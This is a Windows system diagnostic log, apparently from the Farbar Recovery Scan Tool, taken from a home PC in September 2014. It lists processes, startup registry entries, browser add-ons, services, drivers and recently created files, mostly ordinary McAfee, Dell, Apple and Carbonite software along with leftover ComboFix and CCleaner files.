(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Yahoo! Inc.) C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\WLTRAY.EXE
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\ControlCenter3\BrccMCtl.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Carbonite, Inc.) C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\Brmfcmon\BrMfcMon.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(McAfee, Inc.) C:\Program Files\McAfee Online Backup\MOBKbackup.exe
(McAfee, Inc.) C:\Program Files\McAfee Online Backup\MOBKbackup.exe
(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\McVsShld.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [283160 2010-11-06] (Intel Corporation)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Program Files\Dell\DW WLAN Card\WLTRAY.exe [4685824 2014-08-12] (Dell Inc.)
HKLM\...\Run: [RemoteControl9] => C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2009-07-06] (CyberLink Corp.)
HKLM\...\Run: [PDVD9LanguageShortcut] => C:\Program Files\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-04-29] (CyberLink Corp.)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [514832 2014-07-09] (McAfee, Inc.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254696 2012-01-18] (Sun Microsystems, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [496768 2014-07-07] (McAfee, Inc.)
HKLM\...\Run: [BrMfcWnd] => C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe [745472 2009-02-10] (Brother Industries, Ltd.)
HKLM\...\Run: [ControlCenter3] => C:\Program Files\Brother\ControlCenter3\brctrcen.exe [77824 2007-10-30] (Brother Industries, Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1314816 2011-02-24] (Analog Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [Carbonite Backup] => C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe [1056976 2014-06-27] (Carbonite, Inc.)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
Lsa: [Authentication Packages] msv1_0 wvauth
ShellIconOverlayIdentifiers: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: MOBK -> {3c3f3c1a-9153-7c05-f938-622e7003894d} => C:\Program Files\McAfee Online Backup\MOBKshell.dll (McAfee, Inc.)
ShellIconOverlayIdentifiers: MOBK2 -> {e6ea1d7d-144e-b977-98c4-84c53c1a69d0} => C:\Program Files\McAfee Online Backup\MOBKshell.dll (McAfee, Inc.)
ShellIconOverlayIdentifiers: MOBK3 -> {b4caf489-1eec-c617-49ad-8d7088598c06} => C:\Program Files\McAfee Online Backup\MOBKshell.dll (McAfee, Inc.)
ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/?ilc=17
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - DefaultScope {9A33AEE9-913F-4341-A6FC-C2D905CBBAFD} URL = https://search.yahoo.com/search?fr=mcafee&type=B011US0D20140115&p={SearchTerms}
SearchScopes: HKCU - {24C98B7C-CC90-44D6-93C0-509B4F6EE9F1} URL = http://search.yahoo.com/search?p={searchTerms}&fr=chr-ydwnld
SearchScopes: HKCU - {9A33AEE9-913F-4341-A6FC-C2D905CBBAFD} URL = https://search.yahoo.com/search?fr=mcafee&type=B011US0D20140115&p={SearchTerms}
BHO: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
BHO: No Name -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} ->  No File
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll (Yahoo! Inc)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Toolbar: HKLM - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} -  No File
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.169.12 192.168.169.17
Tcpip\..\Interfaces\{BAB2BA9C-F1CF-414A-A0DE-EA9AD3591E6F}: [NameServer] 8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{BC0EE8A6-7D0A-4656-BE50-121CC3D7E979}: [NameServer] 8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_35 -> C:\Windows\system32\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Paul\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Paul\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-10-09]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2011-10-09]
 
Chrome: 
=======
CHR HomePage: Default -> 3357E1BEFC300C15D3BF6D18FED3301ECAB36BA5F675502CDB29D95C359F7FDF
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSearchKeyword: Default -> 8B60D145D244B1DDDC05717A0FC300304FABC72D5B78AFB8AB2177911DC975AC
CHR DefaultSearchURL: Default -> 7BB08588A889EEDE7ACD718C2B49107452B46F50AEDB748C076B5C5F9C1019EF
CHR Plugin: (Shockwave Flash) - C:\Users\Paul\AppData\Local\Google\Chrome\Application\37.0.2062.120\gcswf32.dll No File
CHR Plugin: (Java Deployment Toolkit 6.0.240.7) - C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll No File
CHR Plugin: (Java™ Platform SE 6 U24) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Users\Paul\AppData\Local\Google\Chrome\Application\37.0.2062.120\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Users\Paul\AppData\Local\Google\Chrome\Application\37.0.2062.120\pdf.dll ()
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Users\Paul\AppData\Local\Google\Update\1.3.21.69\npGoogleUpdate3.dll No File
CHR Plugin: (Default Plug-in) - default_plugin No File
CHR CustomProfile: C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-10]
CHR Extension: (SiteAdvisor) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2012-03-09]
CHR Extension: (Skype Click to Call) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2012-03-09]
CHR Extension: (Google Wallet) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-09-10]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2014-09-06]
CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2011-10-18]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 CarboniteService; C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe [5058256 2014-06-27] (Carbonite, Inc. (www.carbonite.com))
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [179592 2012-01-17] ()
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 McAfee SiteAdvisor Service; C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe [167784 2012-08-31] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [527168 2014-07-09] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [471560 2014-07-03] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-03-18] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-05-02] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [179600 2014-05-02] (McAfee, Inc.)
R2 MOBKbackup; C:\Program Files\McAfee Online Backup\MOBKbackup.exe [229688 2010-04-13] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
S3 SecureStorageService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Secure Storage Manager\SecureStorageService.exe [1517448 2011-11-11] (Wave Systems Corp.)
S2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1637888 2011-10-08] () [File not signed]
R2 TdmService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe [2864496 2011-12-08] (Wave Systems Corp.)
R2 wltrysvc; C:\Program Files\Dell\DW WLAN Card\bcmwltry.exe [4038656 2014-08-12] (Dell Inc.) [File not signed]
S3 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [145408 2012-01-16] (Wave Systems Corp.) [File not signed]
S2 0119271410453457mcinstcleanup; C:\Windows\TEMP\011927~1.EXE -cleanup -nolog [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 BCM42RLY; C:\Windows\System32\drivers\BCM42RLY.sys [18424 2014-08-12] (Broadcom Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [61400 2014-05-02] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [134600 2014-05-02] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [236672 2014-05-02] (McAfee, Inc.)
S3 mfebopk; C:\Windows\System32\drivers\mfebopk.sys [66408 2014-05-02] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [367776 2014-05-02] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [574576 2014-05-02] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [345584 2014-03-18] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [81264 2014-03-18] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [215624 2014-05-02] (McAfee, Inc.)
R1 MOBKFilter; C:\Windows\System32\DRIVERS\MOBK.sys [54776 2010-04-13] (Mozy, Inc.)
S3 NAL; C:\Windows\system32\Drivers\iqvw32.sys [30880 2010-02-03] (Intel Corporation )
S3 netvsc; C:\Windows\System32\DRIVERS\netvsc60.sys [126464 2010-11-20] (Microsoft Corporation)
R0 PBADRV; C:\Windows\System32\DRIVERS\PBADRV.sys [26608 2012-09-12] (Dell Inc)
S3 SynthVid; C:\Windows\System32\DRIVERS\VMBusVideoM.sys [19456 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\Paul\AppData\Local\Temp\catchme.sys [X]
S3 mfefirek46; \Device\mfefirek46.sys [X]
S3 mfefirek50; \Device\mfefirek50.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-11 12:27 - 2014-09-11 12:28 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 9.5
2014-09-11 11:12 - 2014-09-11 11:12 - 00053903 _____ () C:\ComboFix.txt
2014-09-11 10:01 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-11 10:01 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-11 10:01 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-11 09:57 - 2014-09-11 09:41 - 05576769 ____R (Swearware) C:\Users\Paul\Desktop\ComboFix.exe
2014-09-11 09:49 - 2014-09-11 11:12 - 00000000 ____D () C:\Qoobox
2014-09-11 09:45 - 2014-09-11 11:10 - 00000000 ____D () C:\Windows\erdnt
2014-09-10 14:20 - 2014-09-11 12:37 - 00000000 ____D () C:\FRST
2014-09-10 13:43 - 2014-09-11 12:27 - 00001484 _____ () C:\Windows\PFRO.log
2014-09-10 13:38 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-10 13:38 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-10 13:38 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-10 13:38 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-10 13:38 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-10 13:38 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-10 13:38 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-10 13:38 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-10 13:38 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-10 13:38 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-10 13:38 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-10 13:38 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-10 13:38 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-10 13:38 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-10 13:38 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-10 13:38 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-10 13:38 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-10 13:38 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-10 13:38 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-10 13:38 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-10 13:38 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-10 13:38 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-10 13:38 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-10 13:38 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-10 13:38 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-10 13:38 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-10 13:38 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-10 13:38 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-10 13:38 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-10 13:38 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-10 13:35 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-10 12:16 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-09-10 12:13 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-10 12:13 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-10 12:07 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-10 11:55 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-10 11:55 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-10 11:28 - 2014-09-11 12:27 - 00001020 _____ () C:\Windows\setupact.log
2014-09-10 11:28 - 2014-09-10 11:28 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-10 10:59 - 2014-09-10 10:59 - 00000000 ____D () C:\Windows\pss
2014-09-10 10:55 - 2014-09-11 12:26 - 00206584 _____ () C:\Windows\WindowsUpdate.log
2014-09-10 10:51 - 2014-09-10 10:51 - 00211818 _____ () C:\Users\Paul\Documents\cc_20140910_105122.reg
2014-09-10 09:05 - 2014-09-10 09:05 - 00000967 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-10 09:05 - 2014-09-10 09:05 - 00000000 ____D () C:\Program Files\CCleaner
